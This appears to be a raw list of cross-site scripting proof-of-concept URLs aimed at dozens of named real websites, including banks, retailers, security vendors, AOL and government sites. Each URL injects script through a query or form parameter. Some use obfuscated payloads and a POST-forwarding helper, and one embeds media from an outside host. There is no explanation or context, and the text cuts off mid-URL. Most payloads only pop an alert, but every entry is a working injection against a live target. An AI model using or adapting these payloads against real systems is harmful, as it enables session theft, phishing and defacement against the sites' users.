http://www.meganet.com/store/Admin/include/errorwindow.asp?lng=English&Message_Id=35&Message_Add=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://webstore.quiltropolis.net/Admin/include/errorwindow.asp?lng=English&Message_Id=5&Message_Add=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.seeitsewit.com/store/Admin/include/errorwindow.asp?lng=English&Message_Id=5&Message_Add=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.uispshop.it/Admin/include/errorwindow.asp?lng=Italian&Message_Id=5&Message_Add=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.lookbook.com.tw/Admin/include/errorwindow.asp?lng=Chinease&Message_Id=5&Message_Add=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.teleweb-online.com.ve/wsi/Admin/include/errorwindow.asp?lng=English&Message_Id=35&Message_Add=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://qualisort.com/butik/Admin/include/errorwindow.asp?lng=Swedish&Message_Id=5&Message_Add=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.cingular.com/sbc/other_databases/locator/storeLocator?link=cingnew_map&streetaddress=XXX%22%3E%3Cimg%20src=%22%22%20onerror=alert('XSS')%3E http://ss587.fusionbot.com/cgi-bin/ss_query?sitenbr=156828927&lgk_shopper_id=885110121850558851&ses_shopper_id=885110121850558851&ses_StrAffCookie=&k=%3CSCRIPT%3Ealert%28location.host%29%3B%3C%2FSCRIPT%3E http://www.buy.com/retail/searchresults.asp?querytype=home&qu=%27%27%29%7B%7D%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cscript%3E&qxt=home&display=col&dclksa=1 http://www.buy.com/retail/searchresults.asp?querytype=home&qu=%27+%3D%3D+alert%28%27XSS%27%29+%26%26+%27&qxt=home&display=col&dclksa=1 http://search.ft.com/searchResults?queryText=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=0&y=0&javascriptEnabled=true http://miarroba.com/recomienda/refer.php?url=%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E http://www.ussearch.com/consumer/cwf?action=browseproduct&pid=3093&searchPhone=1-900-SLA-CKER%3Cscript%3Ealert('XSS')%3C/script%3E&adID=6153004080&sourceid=&adsource=9&fc=orange&TID=4&fc=orange&TID=4 http://www.whitepages.com/10001/search/FindPerson?firstname_begins_with=1&firstname=&name=&housenumber=&street=&city_zip=asdf%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cx%20&state_id= http://www.yellowpages.com/sp/yellowpages/yptransition.jsp?t=&q=Hello%20World%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&ci=&st=&_requestid=768763 http://www.411.com/10668/search/ReverseAddress?housenumber=&street=1337+Road%22%3E%3Cscript%3Eif%28xyz%29alert%28%22XSS%22%29%3Bvar+xyz%3D1%3C%2Fscript%3E%3Cx+&city_zip=&state_id= http://www.switchboard.com/bin/cgidir.dll?cid=&MEM=1&PR=133&ST=1&SD=&VL=&QV=0946EB25B6A7487EA6C3EF614127C770l0280870F409C384588303203O0180840F409C38458A303203O0389293DCB9C384573303203&KW=XSSman%3Cscript%3Eif%28xyz%29alert%28%27XSS%27%29%3Bvar+xyz%3D1%3C%2Fscript%3E%3Cx+&LO=&search.x=0&search.y=0&search=Search http://yellowpages.superpages.com/listings.jsp?C=%3Cscript%3Ealert%28%27XSS%27%29%3Bxss%3D1%3C%2Fscript%3E&N=&STYPE=S&CID=&scale=&lng=&lat=&L=&search=Find+It http://etime.adp.com/index.cfm?destination=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.jcrew.com/content/email/HOL06/oct_100506/spage.jhtml?sssdmh=dm8.118482&srcCode=YPRG&email=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://r4wr.com/crash/index.php?i=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://www.skem9.com/search.php?wh=Layouts&keywords=';alert('xss');a=' http://www.vnunet.com/search/?q=asdf%27%29%3Balert%28%27XSS%27%29%3B//&articlesMax=&downloadsMax=&forumsMax=&reviewsMax=&staticMax=&source=&articlesMinscore=65&zone=articles http://www.sophos.com/products/small-business/sophos-security-suite/eval?field_platforms=1&field_forename=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS0%22%29%3C%2Fscript%3E%3Cx+&field_surname=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E%3Cx+&field_company=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cx+&field_job_title=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E%3Cx+&field_phone_number=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3C%2Fscript%3E%3Cx+&field_email=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS5%22%29%3C%2Fscript%3E%3Cx+&field_address=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS6%22%29%3C%2Fscript%3E%3Cx+&field_address_2=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS7%22%29%3C%2Fscript%3E%3Cx+&field_city=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS8%22%29%3C%2Fscript%3E%3Cx+&field_zip_postal=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS9%22%29%3C%2Fscript%3E%3Cx+&field_country=choose&field_region=XSS+here%22%3E%3Cscript%3Ealert%28%22XSSA%22%29%3C%2Fscript%3E%3Cx+&field_region_list_9=choose&field_region_list_32=choose&field_region_list_183=choose&field_company_size=choose&field_number_users=choose&field_market_sector=choose&submit.x=0&submit.y=0&submit=Submit&lp_keyword=&sid=&path=&field_product=Sophos+Small+Business+Suite&field_lead_id=&field_prom_id=&referer=&main_form=1 http://bbs.conqueronline.com/showthread.php?s=&threadid=18073&highlight=Time11%22%3E%3Cscript%3Ealert('xss')%3C/script%3E http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://freshmeat.net/my/send-hash/&email_real=%3Cscript%3Ealert('xss')%3C/script%3E http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.nexopia.com/invite.php&myname=wwwdot2&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS0')%3C%2Fscript%3E&action=Send http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.nexopia.com/invite.php&myname=wwwdot2&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS00')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS01')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS02')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS03')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS04')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS05')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS06')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS07')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS08')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS09')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS0A')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS0B')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS0C')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS0D')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS0E')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS0F')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS10')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS11')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS12')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS13')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS14')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS15')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS16')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS17')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS18')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS19')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS10')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS1A')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS1B')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS1C')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS1D')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS1E')%3C%2Fscript%3E&friendnames%5B%5D=XSS%20There--%3E&friendemails%5B%5D=%3Cscript%3Ealert('XSS1F')%3C%2Fscript%3E&action=Send http://www.comedycentral.com/search/search_index.jhtml?searchtype=all&pagesize=3&sorttype=default&searchterm=asdf%22 http://www.pridefc.com/pride2005/index.php?mainpage=fighters_list&action=search&s_name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E--%21%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&country_name=0&x=7&y=10 http://www.123greetings.com/cgi-bin/search/search.pl?words=%22%3E%3Cscript%3Ealert(%22Happy%20Halloween%22)%3C/script%3E&fpage=Halloween&I1.x=0&I1.y=0 http://www.hallmark.com/webapp/wcs/stores/servlet/SearchResultsView?Ntt=%22%3E%3Cscript%3Ealert(%22Happy%20Halloween%22)%3C/script%3E&x=0&y=0&storeId=10001&catalogId=10051&N=35&Ntk=all_fields&Ntx=mode%2Bmatchallpartial&RPP=12&SBQ=yes http://www.bluemountain.com/members/forgot.pd?mode=submit&referer=http%3A%2F%2Fwww.bluemountain.com%2Fmembers%2Fsignin.pd%3Freferer%3Dhttp%253A%2F%2Fwww.bluemountain.com&email=%22onmouseover=%22alert('Happy%20Halloween')&Submit.x=0&Submit.y=0&Submit=Submit http://www.americangreetings.com/members/mwho.pd?rt=SR&ld=&od=eyd0ZXJtJzozMCwncnByaWNlJzonMjkuOTknLCdjdXJyc3ltYm9sJzonJiMzNjsnLCdjdXJydWlh%250AYmJyZXYnOidVU0QnLCdwcmljZSc6JzAuMDAnLCdpc3RyaWFsJzoxLCdyZXBvcnR0eXBlJzonU1In%250ALCdtZXJjaG51bSc6MzA4Mzc2NiwncnRlcm0nOjMzNX0%253D%250A&gift=&renewal=&i=&price=0.00&TI=osg9761&m=3083766&usepof=0&nopw=&nbi=&rc=&pdtype=&nb=&purl=&mode=submitted&newemail=&email=%22onmouseover%3D%22alert%28%27Happy+Halloween%27%29&password=&twhosubmit.x=0&twhosubmit.y=0 http://www.2000greetings.com/search.htm?query=%3Cscript%3Ealert%28%27Happy+Halloween%21%27%29%3C%2Fscript%3E&cat=0 http://www.theonion.com/content/ads/premercial.php?target=YmxhaCI7fWFsZXJ0KCdYU1MxJyk7e2E9Ig== http://www.theonion.com/content/ads/premercial.php?target=Ij48c2NyaXB0PmFsZXJ0KCJYU1MiKTwvc2NyaXB0Pjx4IA== http://www.theonion.com/content/search/onion/advanced?search=XSS%22%3E%3Cscript%3Ealert('2%20XSS')%3C/script%3E%3Cx%20&restrict=.site:onion http://www.theonion.com/content/dispatch?email=&error=%3Cscript%3Ealert(%22More%20XSS%20on%20the%20Onion%22)%3C/script%3E http://www.ajaxcoded.com/ajaxsearch.php?a=%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E http://wachovia.mworld.com/m/m.w?lp=Search&type=a&mt=1&ticker=%3Cscript%3Ealert%28%22walk-all-ova-ya%22%29%3C%2Fscript%3E&ty.x=Find&fn=on&fs=on&fsc=on&Col=1&Dir=1&st=&gl=1 http://reg.imageshack.us/content.php?page=email&q=marketing&sub=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E http://reg.imageshack.us/content.php?page=email&q=marketing&sub=%22%20onmouseover=alert(String.fromCharCode(72,97,112,112,121,32,72,97,108,108,111,119,101,101,110,33))%3E http://game.sgnexus.com/index/login?redir=xss%22%20/%3E%3Cscript%3Ealert('Welcome%20to%20the%20forums!')%3C/script%3E http://collect.myspace.com/index.cfm?fuseaction=classifieds.searchAction http://searchresults.myspace.com/index.cfm?fuseaction=advancedFind.web&searchtype=web&searchBoxID=HeaderWebResults&searchrequest=Test http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://collect.myspace.com/index.cfm%3ffuseaction=classifieds.searchAction&categorySearchTerm=dating&keyWord=asdf%22%3E%3CEMBED+SRC%3D%22http%3A%2F%2Fmaluc.sitesled.com%2Fxssmaluc.mov%22%3E%3C%2FEMBED%3E%3Cx+&MinRent=min&MaxRent=max&NumOfRooms=0&minPrice=min&maxPrice=max&minAge=min&maxAge=max http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.dailycupoftech.com/have-your-lost-usb-drive-ask-for-help/&email=%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&subscribe=93 http://cards.halloweenhorrors.net/cgi-bin/search/search.pl?log=halhorror&words=%22%3E%3CSCRIPT%3Ealert%28%22Happy+All+Hallow%27s+Eve%22%29%3C%2Fscript%3E http://tinypic.com/tags/?tag=%22++onmouseover%3Dalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E%3C%21--c--%3E http://www.avast.com/i_kat_72.php?lang=eng&name=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83,49))%3C/script%3E&virus=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83,50))%3C/script%3E http://www.mmauniverse.com/quicksearchsection.html?src=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E--%21%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&x=7&y=16 http://www.totalvid.com/searchResults.cfm?strSearch=%22%3E%3CSCRIPT%3Ealert%28%27mma_xss%27%29%3B%3C%2FSCRIPT%3E&x=0&y=0 http://www.fightingarts.com/reading/get_articles_search.php?word=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E--%21%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&Submit=Go%21 http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.houseofpainironwear.com/search.html&searchval=%22> http://www.houseofpainironwear.com/search.html?searchval=%22%3E%3Cscript%3Eif(!xx)%20alert(String.fromCharCode(88,83,83));var%20xx=1%3C/script%3E%3Cx http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://login.sparknotes.com/signup.sub?uri=&nickname=%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E http://search.cnn.com/pages/search.jsp?query=%22%20onmouseover=%22alert(String.fromCharCode(88,83,83)) https://www-132.ibm.com/webapp/wcs/stores/servlet/UserRegistrationForm?langId=-1&storeId=1&catalogId=asdf%22);alert(%22XSS%22);%3C/script%3E%3Cx&krypto=g3mOZ2uZQalqnkMCJkVJ1Q%3D%3D&ddkey=UserRegistrationForm https://doctor.mozilla.org/doctor.cgi?file=%3Cscript%3Ealert(%22Get%20Opera%22)%3C/script%3E&action=display http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.macys.com/signin/index.ognc&EmailAddress=%22%3E%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&Password=&SIGNINSIGNIN_BUTTON.x=0&SIGNINSIGNIN_BUTTON.y=0&SIGNINSIGNIN_BUTTON=SIGNINSIGNIN_BUTTON https://secure.eluxury.com/secure/account/registration1.jhtml?nextpage=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&_requestid=163562 http://www.sears.com/sr/javasr/search.do?BV_UseBVCookie=Yes&vertical=Sears&keyword=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&gobutton.x=0&gobutton.y=0&gobutton=find http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.bloomingdales.com/signin/index.ognc&EmailAddress=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&Password=&SIGNINSIGNIN_BUTTON.x=0&SIGNINSIGNIN_BUTTON.y=0&SIGNINSIGNIN_BUTTON=SIGNINSIGNIN_BUTTON http://www.neimanmarcus.com/store/catalog/47/search.jhtml?ip_state=&ip_autoSummarize=true&ip_perPage=15&orgUrl=%2Fstore%2Fcatalog%2F47%2Fsearch.jhtml&srcText=%3C%2Fscript%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&x=0&y=0 http://www.saksfifthavenue.com/search/EndecaSearch.jsp?bmForm=endeca_search_form_one&bmFormID=1161658738476&bmUID=1161658738476&bmIsForm=true&bmPrevTemplate=%2Fsearch%2FEndecaSearch.jsp&bmText=SearchString&SearchString=%22%3E%3CIMG+SRC%3D%27%27+onerror%3Dalert%28%27XSS%27%29%3E&bmSingle=N&N=0&bmImage=EndecaSearch.x&bmImage=EndecaSearch.y&bmImage=EndecaSearch&EndecaSearch.x=0&EndecaSearch.y=0&bmHidden=Ntt&Ntt=%22%3E%3CIMG+SRC%3D%27%27+onerror%3Dalert%28%27XSS%27%29%3E&bmHidden=Ntk&Ntk=Entire+Site&bmHidden=Ntx&Ntx=mode%2Bmatchpartialmax&bmHidden=prp8&prp8=t15&bmHidden=prp13&prp13=&bmHidden=sid&sid=10E783F04F3B&bmHidden=ASSORTMENT%3C%3East_id&ASSORTMENT%3C%3East_id=1408474395222441 http://www.jimmychoo.com/pws/CatalogueSearch.ice?resetFilters=true&layout=searchresults.layout&performSearch=true&visible=true&productAttributeName=&productAttributeValue=&keywords=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3Eshoes&x=0&y=0 https://wws.louisvuitton.com/web/html/userprofile/int-register.jsp?displayErrors=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&countryId=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&_requestid=1128879&langue=en_US&buy=0 http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.style.com/services/newsletters&toolkit.application=newsletter&toolkit.applicationId=&formName=shortForm&partnerCode=&sourceCode=&newsletterAndVersions=newsletter.17&newsletterAndVersions=newsletter.35&email=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&IMAGE.x=0&IMAGE.y=0 http://www.rsnake.com/results.jsp?searchTerm=all%20his%20midget%20grannie%20porn%3Cscript%3Ealert%28%22zOMG+maluc+just+owned+RSnake.%21%22%29%3C%2Fscript%3E&x=0&y=0&domainName=rsnake.com&w=false http://eco.netvibes.com/?type=all&q=XSS%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E http://www.mymms.com/search/index.asp?keyword=%22%3E%3Cscript%3Ealert%28%27happy+halloween%27%29%3C%2Fscript%3E http://www2.mms.com/us/baking/recipes/searchrecipe.jsp?q=%3Cscript%3Ealert%28%27happy+halloween%27%29%3C/script%3E http://www.cfsan.fda.gov/cgi-bin/ws.cgi?QUERY=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&stype=OR&submit=Search http://www.buy.com/retail/searchresults.asp?querytype=home&qu=%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&qxt=home&display=&dclksa=1 http://www.perfectmatch.com/hp/pepper/Pepper14.asp?v=2&rt=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E%3C http://militaryhistory.about.com/gi/dynamic/offsite.htm?zi=1/XJ&sdn=militaryhistory&zu=%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E http://search.about.com/fullsearch.htm?TopNode=%2F&terms=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&x=0&y=0 http://searchg.symantec.com/search?q=';alert(%22XSS%22);//&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=gbh&x=0&y=0 http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://us.mcafee.com/virusInfo/default.asp&SearchType=2&searchString=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://aiw2.uspto.gov/.aiw?HomeUrl=%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E http://messageboards.aol.com/aol/en_us/search.php?search=%22%3E%3Cbody+onload%3D%22alert%28%27xss%27%29%22+&boardId=334522&channel=usfriendsandflirts&search_all=1&search_type=2 http://peopleconnection.aol.com/think-pink/?icid=pc:';alert('xss');// https://my.screenname.aol.com/_cqr/help/infoPopUp.jsp?loginError=');alert('xss');// http://www.aol.com/redir.adp?_e_t=ap&_a_v=2.0&_a_i=100124311x1099139803x1076741866&_url=%0D%0A%0D%0A%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E%3C%21%2D%2D http://us.video.aol.com/video.full.adp?mode=2&guideContext=65.72&pmmsid=1751047&restartUrl=';alert('xss');// https://account.login.aol.com/opr/_cqr/opr/opr.psp?lang=');alert('xss');// http://www.styledash.com/search/?q=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&x=0&y=0 http://www.dubfire.net/boarding_pass/nwa.php?fname=Osama&lname=Bin+Laden&seatnum=07-C&gatenum=A10&date=27OCT2006&flight=7305&gatenum=A10&deptcity=Indianapolis%2C+IN%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&destcity=Washington+-+Reagan+Nat%27l&depttime=10%3A50AM&desttime=1%3A30PM&class=Coach+Class https://www.wellsfargo.com/app2k/prefill_invoke.jhtml?event=BeginAppsFlow&context=ApplicationViewAll&productsetid=APP2K&productcode=CH%22>alert('xss') http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://support.wush.net/order/checkout.php&style=&v=3&apidata=a%253A12%253A%257Bs%253A1%253A%2522v%2522%253Bs%253A1%253A%25223%2522%253Bs%253A13%253A%2522type3_package%2522%253Bs%253A1%253A%25227%2522%253Bs%253A14%253A%2522submit_package%2522%253Bs%253A7%253A%2522package%2522%253Bs%253A13%253A%2522submit_domain%2522%253Bs%253A4%253A%2522skip%2522%253Bs%253A3%253A%2522aid%2522%253Bs%253A0%253A%2522%2522%253Bs%253A6%253A%2522c_code%2522%253Bs%253A0%253A%2522%2522%253Bs%253A14%253A%2522display_totals%2522%253Bs%253A1%253A%25221%2522%253Bs%253A13%253A%2522billing_cycle%2522%253Bs%253A1%253A%25221%2522%253Bs%253A11%253A%2522coupon_code%2522%253Bs%253A3%253A%2522%255C%2522%253E%2522%253Bs%253A6%253A%2522submit%2522%253Bs%253A19%253A%2522Calculate+Totals+%253E%253E%2522%253Bs%253A5%253A%2522debug%2522%253Bi%253A0%253Bs%253A7%253A%2522coupons%2522%253Ba%253A0%253A%257B%257D%257D&client_status=new&x_First_Name=%22%20onmouseover%3dalert(1337)%20%22&x_Last_Name=&x_Company=&x_Address=&x_Address_2=&x_City=&x_State=&x_Country=US&x_Zip=&x_Email=&x_Phone=&x_Email_2=&x_Phone_2=&username=&password=&pass_check=&comments=&referrer=Other&pay_method=creditcard&pay_method=paypal&x_Card_Name=&x_Card_Num=&x_Card_Type=Visa&x_Exp_Month=1&x_Exp_Year=2006&x_Card_Code=&tos=1&tos=0&submit_verify=Verify%20My%20Order%20%3E%3E http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://support.wush.net/order/checkout.php&style=&v=2&apidata=a%253A12%253A%257Bs%253A1%253A%2522v%2522%253Bs%253A1%253A%25222%2522%253Bs%253A13%253A%2522type3_package%2522%253Bs%253A1%253A%25228%2522%253Bs%253A14%253A%2522submit_package%2522%253Bs%253A7%253A%2522package%2522%253Bs%253A13%253A%2522submit_domain%2522%253Bs%253A4%253A%2522skip%2522%253Bs%253A3%253A%2522aid%2522%253Bs%253A0%253A%2522%2522%253Bs%253A6%253A%2522c_code%2522%253Bs%253A0%253A%2522%2522%253Bs%253A14%253A%2522display_totals%2522%253Bs%253A1%253A%25221%2522%253Bs%253A13%253A%2522billing_cycle%2522%253Bs%253A1%253A%25221%2522%253Bs%253A11%253A%2522coupon_code%2522%253Bs%253A5%253A%2522%255C%2522ASD%2522%253Bs%253A6%253A%2522submit%2522%253Bs%253A19%253A%2522Calculate+Totals+%253E%253E%2522%253Bs%253A5%253A%2522debug%2522%253Bi%253A0%253Bs%253A7%253A%2522coupons%2522%253Ba%253A0%253A%257B%257D%257D&client_status=existing&client_username=%22%20onmouseover%3dalert(1337)%20%22&client_password=&submit=Continue%20%3E%3E http://www.weebls-stuff.com/search/index.php?q=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%0D%0A https://diet.webmd.com/webmddiet/default_main.aspx?referrer='%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c'%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%3e%3c%2fSCRIPT%3e!--%3cSCRIPT%3ealert(String.fromCharCode(88%2c83%2c83))%3c%2fSCRIPT%3e%3d%26%7b%7d&weightactual='%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c'%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%3e%3c%2fSCRIPT%3e!--%3cSCRIPT%3ealert(String.fromCharCode(88%2c83%2c83))%3c%2fSCRIPT%3e%3d%26%7b%7d&hasfield_weightactual='%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c'%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%3e%3c%2fSCRIPT%3e!--%3cSCRIPT%3ealert(String.fromCharCode(88%2c83%2c83))%3c%2fSCRIPT%3e%3d%26%7b%7d&heightfeet='%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c'%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%3e%3c%2fSCRIPT%3e!--%3cSCRIPT%3ealert(String.fromCharCode(88%2c83%2c83))%3c%2fSCRIPT%3e%3d%26%7b%7d&hasfield_heightfeet='%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c'%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%5c%22%3balert(String.fromCharCode(88%2c83%2c83))%2f%2f%3e%3c%2fSCRIPT%3e!--%3cSCRIPT%3ealert(String.fromCharCode(88%2c83%2c83))%3c%2fSCRIPT%3e%3d%26%7b%7d&heightinches='%3balert(String.fromCharCode(88%2c8